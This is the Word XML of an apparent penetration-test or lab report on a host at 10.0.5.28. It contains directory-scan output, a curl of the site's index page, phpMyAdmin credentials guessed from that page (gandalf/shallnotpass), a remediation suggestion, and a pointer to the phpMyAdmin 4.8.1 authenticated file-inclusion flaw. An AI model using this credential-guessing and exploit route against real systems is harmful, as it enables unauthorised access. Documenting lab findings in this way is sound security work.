    <w:p w14:paraId="04CD1498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>http://10.0.5.28/phpmyadmin        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Status: 301) [Size: 311] [--&gt; http://10.0.5.28/phpmyadmin/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9BCC2E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 xml:space="preserve">http://10.0.5.28/server-status     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Status: 403) [Size: 274]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4ED0E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>Progress: 4097 / 4615 (88.78</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>==============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303724F4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>2022/11/19 15:22:21 Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E916993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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C0A70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6BC07DAF" w14:textId="77777777" w:rsidR="00FF276C" w:rsidRDefault="00FF276C" w:rsidP="00BF382D"/>
    <w:p w14:paraId="1F4E2BE1" w14:textId="34C31D7B" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="3C4ECB27" w14:textId="35D47E58" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D"/>
    <w:p w14:paraId="33FFD461" w14:textId="788361FB" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D"/>
    <w:p w14:paraId="6352C4BB" w14:textId="1DF60D53" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D"/>
    <w:p w14:paraId="0369EEB1" w14:textId="11F69EFF" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00BF382D"/>
    <w:p w14:paraId="3D3E53EF" w14:textId="1B26D39D" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00BF382D"/>
    <w:p w14:paraId="3B90F511" w14:textId="77777777" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00BF382D"/>
    <w:p w14:paraId="091A4CD6" w14:textId="3E2D8CED" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshot of “index.html”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A673B64" w14:textId="4E9A4931" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5219AF" wp14:editId="69721A6C">
            <wp:extent cx="5943600" cy="5355590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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C016" w14:textId="0833B2F5" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00814189"/>
    <w:p w14:paraId="426525DD" w14:textId="3D6A665A" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00814189"/>
    <w:p w14:paraId="35E56715" w14:textId="3CB0690B" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00814189"/>
    <w:p w14:paraId="56BAB1B9" w14:textId="5340E12B" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00814189"/>
    <w:p w14:paraId="7B0B1C17" w14:textId="744186A7" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00814189"/>
    <w:p w14:paraId="10D7AEE1" w14:textId="3D5CAB1B" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00814189"/>
    <w:p w14:paraId="271CFB95" w14:textId="77777777" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00814189"/>
    <w:p w14:paraId="756666CD" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189"/>
    <w:p w14:paraId="2EC50B10" w14:textId="0313CC93" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Source of “index.html” via curl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D821591" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>┌──(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>champuser</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42823AC3" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>└─$ curl http://10.0.5.28/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19151193" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;!</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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584FF9DC" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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0F315560" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0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D41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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72A4FF4A" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Gandalf Bio:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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3EE2BBA9" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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1B460CF3" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Gandalf is a legendary wizard of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Middle-earth</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">! His preferred weapons are his wizard staff, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>glamdring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>narya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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gramEnd"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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696B95D9" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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5F60A249" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41B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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"shallnotpass.gif"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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spellStart"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shallnotpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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193EBF69" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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1741E069" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0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D41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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554AD7A3" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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333F6A99" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0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D41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41BC0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22E93604" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRPr="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00D41B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41BC0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD11C6F" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189"/>
    <w:p w14:paraId="5F3A7561" w14:textId="77755880" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
      <w:r>
        <w:t>Screenshot of “phpMyAdmin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E367EB" w14:textId="121E2608" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29A5C385" wp14:editId="4CDDC4F6">
            <wp:extent cx="5943600" cy="3235960"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="6" name="Picture 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0162" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189"/>
    <w:p w14:paraId="633C6AA8" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189"/>
    <w:p w14:paraId="2D129D69" w14:textId="77777777" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189"/>
    <w:p w14:paraId="3CD6469F" w14:textId="76D972D3" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using the source of “index.html” page, the user can guess username/passwo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41BC0" w14:paraId="065C7692" w14:textId="77777777" w:rsidTr="00D41BC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D351AF0" w14:textId="6A695A0A" w:rsidR="00D41BC0" w:rsidRPr="00900CFB" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00900CFB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>phpMyAdmin Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="595754C9" w14:textId="10D38C26" w:rsidR="00D41BC0" w:rsidRPr="00900CFB" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00900CFB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>phpMyAdmin Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D41BC0" w14:paraId="5BD13ADD" w14:textId="77777777" w:rsidTr="00D41BC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="243D6076" w14:textId="0E464B58" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gandalf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61AA42CA" w14:textId="71ACCCB4" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shallnotpass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59A063EB" w14:textId="1BEC20C6" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189"/>
    <w:p w14:paraId="4CB20C38" w14:textId="731DDE7D" w:rsidR="00D41BC0" w:rsidRDefault="00D41BC0" w:rsidP="00814189">
      <w:r>
        <w:t>Screenshot of authenticated phpMyAdmin webpage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BED5386" w14:textId="16D98CA2" w:rsidR="00D41BC0" w:rsidRDefault="00E47099" w:rsidP="00814189">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6784CB70" wp14:editId="5AEB7AF9">
            <wp:extent cx="5943600" cy="5003165"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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E517" w14:textId="3428BEC5" w:rsidR="00E47099" w:rsidRDefault="00E47099" w:rsidP="00814189"/>
    <w:p w14:paraId="1A2B6841" w14:textId="6CB21869" w:rsidR="007229B6" w:rsidRDefault="007229B6" w:rsidP="00814189">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="007229B6">
        <w:t xml:space="preserve">recommended </w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="007229B6">
        <w:t>emediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> here would be to use more unique/non-easily guessable passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328554B" w14:textId="3D5CC356" w:rsidR="00E47099" w:rsidRDefault="00E47099" w:rsidP="00814189"/>
    <w:p w14:paraId="2ABE90B7" w14:textId="6BC2781F" w:rsidR="00E47099" w:rsidRDefault="00E47099" w:rsidP="00814189"/>
    <w:p w14:paraId="1E872D95" w14:textId="42EC6B65" w:rsidR="00E47099" w:rsidRDefault="00E47099" w:rsidP="00814189"/>
    <w:p w14:paraId="0EF253D5" w14:textId="0186C660" w:rsidR="00E47099" w:rsidRDefault="00E47099" w:rsidP="00814189"/>
    <w:p w14:paraId="3EDD71D5" w14:textId="61C2EC27" w:rsidR="00814189" w:rsidRPr="00E47099" w:rsidRDefault="00814189" w:rsidP="00814189">
      <w:r w:rsidRPr="00E47099">
        <w:lastRenderedPageBreak/>
        <w:t>Port 80: phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7046E6" w14:textId="23A9F5DA" w:rsidR="00814189" w:rsidRDefault="00000000" w:rsidP="00814189">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00814189" w:rsidRPr="00814189">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2018-12613</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00814189" w:rsidRPr="00814189">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00814189" w:rsidRPr="00E47099">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>exploitDB</w:t>
        </w:r>
